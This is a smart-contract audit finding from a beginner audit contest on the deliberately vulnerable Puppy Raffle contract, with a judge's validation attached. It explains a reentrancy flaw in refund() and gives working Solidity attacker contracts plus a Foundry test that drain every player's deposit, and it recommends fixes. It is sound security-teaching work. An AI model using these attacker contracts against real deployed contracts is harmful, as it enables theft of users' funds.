Puppy Raffle
AI First Flight #1
Beginner FriendlyFoundrySolidityNFT
EXP
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Submission Details
Severity: high
Valid

Reentrancy in `refund` allows complete fund drainage

mathcelo

The refund function (L109-124) violates the checks-effects-interactions pattern. It sends ETH to msg.sender via Address.sendValue at L120 before updating state at L122:

payable(msg.sender).sendValue(entranceFee); // L120: external call
players[playerIndex] = address(0); // L122: state update

Address.sendValue internally calls recipient.call{value: amount}(""), which forwards all remaining gas to the recipient. If msg.sender is a contract, its receive() function executes with enough gas to re-enter refund. Because players[playerIndex] still holds the attacker's address at the time of re-entry, both the ownership check (L112) and the zero-address guard (L118) pass. The attacker can repeat this until the contract balance is fully drained.

Exploit Scenario

  1. Five legitimate players enter the raffle, depositing 5 ETH total.

  2. An attacker deploys ReentrancyAttacker and enters the raffle with 1 ETH.

  3. The attacker calls attack(), which invokes refund().

  4. On receiving the 1 ETH refund, the attacker's receive() re-enters refund().

  5. Each re-entrant call extracts another 1 ETH. This repeats until the contract balance reaches 0.

  6. The attacker ends with 6 ETH (5 stolen + 1 refunded). All other players lose their deposits.

Proof of Concept

Attacker contract:

contract ReentrancyAttacker {
PuppyRaffle immutable victim;
uint256 immutable entranceFee;
uint256 playerIndex;
constructor(PuppyRaffle _victim) {
victim = _victim;
entranceFee = _victim.entranceFee();
}
function attack() external payable {
address[] memory players = new address[](1);
players[0] = address(this);
victim.enterRaffle{value: entranceFee}(players);
playerIndex = victim.getActivePlayerIndex(address(this));
victim.refund(playerIndex);
}
receive() external payable {
if (address(victim).balance >= entranceFee) {
victim.refund(playerIndex);
}
}
}

Test:

function test_reentrancyRefund() public {
// 5 legitimate players enter
address[] memory players = new address[](5);
players[0] = playerOne;
players[1] = playerTwo;
players[2] = playerThree;
players[3] = playerFour;
players[4] = address(5);
puppyRaffle.enterRaffle{value: entranceFee * 5}(players);
// Deploy attacker and fund it with 1 entrance fee
ReentrancyAttacker attacker = new ReentrancyAttacker(puppyRaffle);
vm.deal(address(attacker), entranceFee);
uint256 startingAttackerBalance = address(attacker).balance;
uint256 startingRaffleBalance = address(puppyRaffle).balance;
// Attack: enter + refund reentrantly to drain all funds
attacker.attack();
// Attacker now holds all 6 players' entrance fees
// (5 victims + its own refunded fee)
assertEq(
address(attacker).balance,
startingAttackerBalance + startingRaffleBalance
);
assertEq(address(puppyRaffle).balance, 0);
}

Recommendations

Short term: Reorder the function to follow the checks-effects-interactions pattern. Move the state update before the external call:

players[playerIndex] = address(0);
emit RaffleRefunded(playerAddress);
payable(msg.sender).sendValue(entranceFee);

Long term: Add a reentrancy guard (e.g., OpenZeppelin's ReentrancyGuard) to all functions that make external calls. Consider upgrading to Solidity 0.8+ and using nonReentrant modifiers.

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 4 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-02] Reentrancy Vulnerability In refund() function

## Description The `PuppyRaffle::refund()` function doesn't have any mechanism to prevent a reentrancy attack and doesn't follow the Check-effects-interactions pattern ## Vulnerability Details ```javascript function refund(uint256 playerIndex) public { address playerAddress = players[playerIndex]; require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund"); require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active"); payable(msg.sender).sendValue(entranceFee); players[playerIndex] = address(0); emit RaffleRefunded(playerAddress); } ``` In the provided PuppyRaffle contract is potentially vulnerable to reentrancy attacks. This is because it first sends Ether to msg.sender and then updates the state of the contract.a malicious contract could re-enter the refund function before the state is updated. ## Impact If exploited, this vulnerability could allow a malicious contract to drain Ether from the PuppyRaffle contract, leading to loss of funds for the contract and its users. ```javascript PuppyRaffle.players (src/PuppyRaffle.sol#23) can be used in cross function reentrancies: - PuppyRaffle.enterRaffle(address[]) (src/PuppyRaffle.sol#79-92) - PuppyRaffle.getActivePlayerIndex(address) (src/PuppyRaffle.sol#110-117) - PuppyRaffle.players (src/PuppyRaffle.sol#23) - PuppyRaffle.refund(uint256) (src/PuppyRaffle.sol#96-105) - PuppyRaffle.selectWinner() (src/PuppyRaffle.sol#125-154) ``` ## POC <details> ```solidity // SPDX-License-Identifier: MIT pragma solidity ^0.7.6; import "./PuppyRaffle.sol"; contract AttackContract { PuppyRaffle public puppyRaffle; uint256 public receivedEther; constructor(PuppyRaffle _puppyRaffle) { puppyRaffle = _puppyRaffle; } function attack() public payable { require(msg.value > 0); // Create a dynamic array and push the sender's address address[] memory players = new address[](1); players[0] = address(this); puppyRaffle.enterRaffle{value: msg.value}(players); } fallback() external payable { if (address(puppyRaffle).balance >= msg.value) { receivedEther += msg.value; // Find the index of the sender's address uint256 playerIndex = puppyRaffle.getActivePlayerIndex(address(this)); if (playerIndex > 0) { // Refund the sender if they are in the raffle puppyRaffle.refund(playerIndex); } } } } ``` we create a malicious contract (AttackContract) that enters the raffle and then uses its fallback function to repeatedly call refund before the PuppyRaffle contract has a chance to update its state. </details> ## Recommendations To mitigate the reentrancy vulnerability, you should follow the Checks-Effects-Interactions pattern. This pattern suggests that you should make any state changes before calling external contracts or sending Ether. Here's how you can modify the refund function: ```javascript function refund(uint256 playerIndex) public { address playerAddress = players[playerIndex]; require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund"); require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active"); // Update the state before sending Ether players[playerIndex] = address(0); emit RaffleRefunded(playerAddress); // Now it's safe to send Ether (bool success, ) = payable(msg.sender).call{value: entranceFee}(""); require(success, "PuppyRaffle: Failed to refund"); } ``` This way, even if the msg.sender is a malicious contract that tries to re-enter the refund function, it will fail the require check because the player's address has already been set to address(0).Also we changed the event is emitted before the external call, and the external call is the last step in the function. This mitigates the risk of a reentrancy attack.

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